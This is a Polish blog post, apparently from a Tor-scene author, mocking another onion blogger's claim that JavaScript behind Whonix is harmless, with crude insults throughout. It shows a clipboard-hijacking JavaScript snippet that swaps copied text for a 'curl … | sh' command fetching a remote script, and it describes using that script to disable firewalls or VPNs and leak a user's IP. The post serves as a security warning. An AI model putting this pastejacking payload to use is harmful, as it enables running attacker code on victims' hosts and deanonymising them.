vegeta_ssj@saiyajinz:~/posty/copy-paste$

js'y za whonixem nie są groźne xD

4 minuty czytania opublikowano: 04.04.2021

konkurs na bzdurę roku napisaną przez policję
Czytałem sobie ostatnio bloga mojego różowego przyjaciela Kranga i 
alfabetycznie agregowałem bzdury i nonsensy które jegomość wypisuje na swoim
niby różowym ale jednak niebieskim wordpressie xD 

Jest tam coś takiego jak regulamin:

uo57sqpw4h3g3y3w2j346vxidgcv2iwfaxeyt3ww3tzkj2i5k7a5tpqd.onion/regulamin

Można tam znaleźć ciekawe zdania argumentujące obecność java scriptów 
na jego blogu:

Jeśli jesteś świadomym użytkownikiem i znasz wszystkie za i przeciw wiesz, że 
JavaScript zza Whonix Gateway nie naraża Cie na niebezpieczeństwa związane z 
uruchomieniem tych skryptów w swojej przeglądarce tak jakby to było w zwykłej 
przeglądarce w clearnecie.



Wierzę, że w polskiej policji pracuje wielu zdolnych, inteligentnych,
bystrych i zmotywowanych policjantów, ale jeżeli byłbym wodzem, generałem 
czy kimś takim to tych od cebulki oddelegowałbym do zabezpieczania meczy 
na Łazienkowskiej. Opcjonalnie pała, gwizdek i skrzyżowanie.

Do rzeczy. TL:DR maj frend joł. Pokażę ci Krangu jak js'y załadowane do 
przeglądarki znajdującej się w torowanej wirtualnej maszynie pod whonixem 
mogą pozwolić na wyskoczenie z wirtualnej maszyny i wykonanie polecenia na 
hoście. Bez exploit chainów i innych zaawansowanych technik. Potrzebne są 
jedynie sprzyjające okoliczności o wysokim stopniu prawdopodobieństwa.

JS = zło co by wam Krang nie mówił i jak bardzo łechtał frazesami
"świadomy użytkownik" ble ble ble- nie, java script nie są dobre w torze i
stanowią zagrożenie.

Żeby wszystko się udało, atakowany jegomość musi mieć dzielony schowek z 
hostem. Ja np. mam, bo to wygodne xD 

Żeby zrealizować scenariusz, umieściłbym jakiś tutek czy inny taki który
wymusiłby skopiowanie poleceń na host. Nie jest to sobie chyba trudno
wyobrazić nie? Następnie wrzuciłbym kawałek kodu w js'ie który skanuje
schowek i tam gdzie trzeba dorzuci coś ode mnie ty samym zamieniając
niewinnie wyglądające polecenie na wykonanie złośliwego kodu.

briantracy.xyz/writing/copy-paste-shell.html
blog.aptmasterclass.com/post/czy-ctrl-c-i-ctrl-v-moga-byc-grozne
https://nfsec.pl/ai/6283

document.getElementById('niespo').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', 'echo "A jednak wykonamy \
[curl https://www.saiyajinz.cc/skrypty/execute-copy.txt | sh]"\n');
e.preventDefault();
});

W zdalnej lokalizacji można umieścić skrypt w bashu który odpalony z sudo
wyłączy firewalla czy ubije vpn'a i np. wykona żądanie http do serwera
pod kontrolą atakującego tym samym ujawniając adres IP. Konieczne jest
umieszczenie polecenia ze znakiem nowej lini, bo skopiowany od razu się
wykona i nieszczęśnik jak zorientuje się, że kopiował jakby inny link
z githuba czy innego pastebina będzie już za późno.

W przykładzie saiyajinz.cc/skrytpy/execute-copy.txt wrzuciłem
po prostu sudo apt update ;) 

curl https://www.saiyajinz.cc/skrytpy/execute-copy.txt | bash

Teraz jeszcze słówko o no scriptcie i o zagrożeniach. Krangu: w branży
przestępczej jest tak, że jak popełniasz błąd to kolejnych kilka lat
możesz spędzić w piwnicy. Nie wiesz jakim arsenałem dysponuje przeciwnik,
(no może nie wy akurat, bo oprócz wielkiej mordy i 23.000 kont na cebulce
za wiele nie macie), ale zawsze należy być gotowym na najgorsze, bo 
odpowiednio zmotywowany przeciwnik, może dysponować zaawansowanym exploit
kitem który zrobi brzydkie rzeczy a zacznie właśnie od załadowania js'a
do przeglądarki, bo atak taki miał już miejsce i w momencie egzekucji
wykorzystywał 3rd daya na firefoxa. 

A do was drodzy bracia: jak latacie po torze ubijajcie js'y w 
przeglądarce w about:config nie żadnym pluginem, bo zapewne wiecie, że 
no-script około rok temu czy ile (nie pamiętam) wziął, zepsuł się i nie 
działał. Ciekawe to było i w sumie przeszło bez specjalnego echa a to 
trochę tak jakbyś dmuchał laskę na imprezce z którą niekoniecznie 
chciałbyś mieć małe parchate a potem się dowiedział, że dla śmiechu 
przedziurawiła durexa przed radością xDDD

PS. Na stronie Kranga nie ma i tak nic czego nie znalazłbyś na
haker.edu.pl xDDDD więc chyba nie warto ryzykować.

PS 2. Znalazłem w kodzie Krangowego wordpressa coś śmiesznego xD



function copy_to_clipBoard() {
var copyText = document.getElementById("mref-link-buddypress-profile");
copyText.select();
document.execCommand("copy");

Chyba yebany coś już ćwiczył xDDDDDDDDDDDDDD
Pozdro dla moich czarnych